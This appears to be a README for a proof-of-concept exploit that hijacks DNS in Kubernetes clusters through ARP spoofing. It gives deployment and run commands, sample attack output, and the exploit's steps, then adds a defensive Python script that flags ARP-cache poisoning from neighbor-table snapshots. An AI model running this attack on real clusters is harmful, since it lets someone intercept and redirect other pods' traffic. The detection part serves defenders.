A POC for DNS spoofing in Kubernetes clusters. Runs with minimum capabilities, on default installations of Kubernetes.


Kube-dnsspoof is a POC for DNS spoofing in Kubernetes clusters. This exploit runs with minimum capabilities, on default installations of Kubernetes. This repository contains all files and related code for running this exploit.

The following video (asciicast) demonstrates how one can use this to intercept traffic for specific domains in a cluster. Further reading on this subject is available in this blog post.


A Kubernetes cluster

Run the exploit

First, create the pods by:

$ kubectl create -f pods/
pod/hacker created     
pod/victim created   

After the pods are created, exec into the hacker pod. It will contain the exploit and hosts file inside the /dnsspoof folder.

$ kubectl exec -it hacker zsh
➜  hacker /dnsspoof ls  hosts
➜  hacker /dnsspoof 

Next, edit the hosts file to contain your spoofed domains. The script will proxy all DNS requests to the real kube-dns pod, except for the entries in the hosts file.

Example of a successful run of the exploit:

➜  hacker /dnsspoof ./
[*] starting attack on indirect mode
Bridge: c0:0f:fe:eb:4b:e0
Kube-dns: 02:42:bb:76:74:f8

[+] Taking over DNS requests from kube-dns. press Ctrl+C to stop


When proxying a lot of requests, the code can hang. To control this, you can pass a timeout via --forward-timeout

The steps of the exploit:

  • Deciding whether it can run
  • Discovering relevant MAC/IP addresses
  • ARP spoofing the bridge (and kube-dns in case of direct attack mode)
  • Proxying DNS requests and spoofing relevant entries
  • Restoring all network on CTRL+C interrupt
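
The ARP spoofing step leaves a trace in the node's neighbor table, which gives defenders a place to detect it. The following is an added example, not part of this repository: it compares two snapshots of `ip neigh show` output and flags an IP whose MAC changed or a MAC that answers for several IPs. The interface name `cni0` and the pod IPs are constructed assumptions; the kube-dns MAC is the one printed in the sample run above.

```python
import re
from collections import defaultdict

# Resolved rows of `ip neigh show`; FAILED/INCOMPLETE rows carry no lladdr.
NEIGH_RE = re.compile(r"^(\S+) dev (\S+) lladdr ([0-9a-f:]{17})\b", re.I)

def parse_neigh(text):
    """Return {(dev, ip): mac} for every resolved neighbor entry."""
    table = {}
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:
            ip, dev, mac = m.groups()
            table[(dev, ip)] = mac.lower()
    return table

def arp_anomalies(before, after):
    """Compare two snapshots and report signs of ARP cache poisoning."""
    old, new = parse_neigh(before), parse_neigh(after)
    findings = []
    # 1. An IP on the same interface that moved to a different MAC.
    for key, mac in sorted(new.items()):
        if key in old and old[key] != mac:
            findings.append(("mac_changed", key[1], old[key], mac))
    # 2. One MAC answering for several IPs on the same interface.
    owners = defaultdict(set)
    for (dev, ip), mac in new.items():
        owners[(dev, mac)].add(ip)
    for (dev, mac), ips in sorted(owners.items()):
        if len(ips) > 1:
            findings.append(("shared_mac", mac, tuple(sorted(ips))))
    return findings

# Constructed sample data: 10.244.0.2 plays kube-dns, 10.244.0.7 another pod.
BASELINE = """\
10.244.0.2 dev cni0 lladdr 02:42:bb:76:74:f8 REACHABLE
10.244.0.7 dev cni0 lladdr 02:42:0a:f4:00:07 REACHABLE
10.244.0.9 dev cni0  FAILED
"""
POISONED = """\
10.244.0.2 dev cni0 lladdr 02:42:0a:f4:00:07 REACHABLE
10.244.0.7 dev cni0 lladdr 02:42:0a:f4:00:07 STALE
10.244.0.9 dev cni0  FAILED
"""

if __name__ == "__main__":
    for finding in arp_anomalies(BASELINE, POISONED):
        print(finding)
```

Some legitimate setups share one MAC across several IPs, so a `shared_mac` finding is a lead to check against the pod inventory rather than proof on its own.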